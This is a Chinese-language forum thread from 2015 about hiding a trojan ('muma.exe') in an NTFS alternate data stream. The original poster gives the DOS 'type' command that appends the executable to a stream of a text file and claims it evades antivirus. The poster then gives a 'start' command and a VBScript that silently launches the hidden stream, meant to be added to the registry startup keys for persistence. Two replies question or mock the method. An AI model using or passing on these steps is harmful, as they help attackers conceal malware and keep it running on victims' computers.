扫一扫,访问微社区

新浪微博登陆

只需一步, 快速开始

登录 | 加入雨荷 | 找回密码

数据恢复,winhex视频,数据恢复培训,硬盘数据恢复,raid0,raid1,raid5数据恢复,雨荷数据

 找回密码
 加入雨荷

扫一扫,访问微社区

新浪微博登陆

只需一步, 快速开始

总共6076条微博

动态微博

查看: 938|回复: 4

把木马隐藏在NTFS数据流

  [复制链接]
  • TA的每日心情
    难过
    2015-3-17 23:22
  • 签到天数: 15 天

    [LV.4]匆匆过客

    新浪微博达人勋

    发表于 2015-3-15 23:27:46 | 显示全部楼层 |阅读模式
    利用DOS命令把木马隐藏在NTFS数据流 中。     D:\>type muma.exe>>1.txt:2.exe    并且可以达到免杀和隐藏的效果                  

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?加入雨荷 新浪微博登陆

    x
  • TA的每日心情
    开心
    2017-2-2 08:54
  • 签到天数: 64 天

    [LV.6]站长亲人

    新浪微博达人勋

    发表于 2015-3-16 13:13:19 | 显示全部楼层
    不知道有什么意义,这个是常驻属性,如果不在文件内容内,也是不可能被运行的
  • TA的每日心情
    难过
    2015-3-17 23:22
  • 签到天数: 15 天

    [LV.4]匆匆过客

    新浪微博达人勋

     楼主| 发表于 2015-3-16 22:11:56 | 显示全部楼层
    D盘(NTFS格式)放muma.exe和1.txt文件
    D:\>type muma.exe>>1.txt:2.exe     把muma.exe 到寄宿到1.txt中作为隐藏的流文件
    D:\>start d:\1.txt:2.exe                  用start命令查看隐藏在1.txt中的流文件
    建立个脚本命名为start.vbs
    CreateObject("Wscript,shell").Run"cmd /c start d:\1.txt:2.exe ",0

    把start.vbs加入到注册表启动项里运行。
  • TA的每日心情
    擦汗
    2018-7-4 13:30
  • 签到天数: 59 天

    [LV.5]站长亲戚

    新浪微博达人勋

    发表于 2016-10-13 19:41:39 | 显示全部楼层
  • TA的每日心情
    开心
    昨天 09:55
  • 签到天数: 2138 天

    [LV.Master]

    新浪微博达人勋

    发表于 2016-10-26 00:25:08 | 显示全部楼层
    “把start.vbs加入到注册表启动项里运行。” ___ 看到这句我笑了,呵呵。
    发表回复
    您需要登录后才可以回帖 登录 | 加入雨荷 新浪微博登陆

    本版积分规则

    Copyright © 2001-2015 All Rights Reserved雨荷数据安全技术论坛 陕ICP备08105630

    QQ|申请友链|小黑屋|手机版|Archiver|雨荷数据安全技术论坛 ( 陕ICP备17009169号

    快速回复 返回顶部 返回列表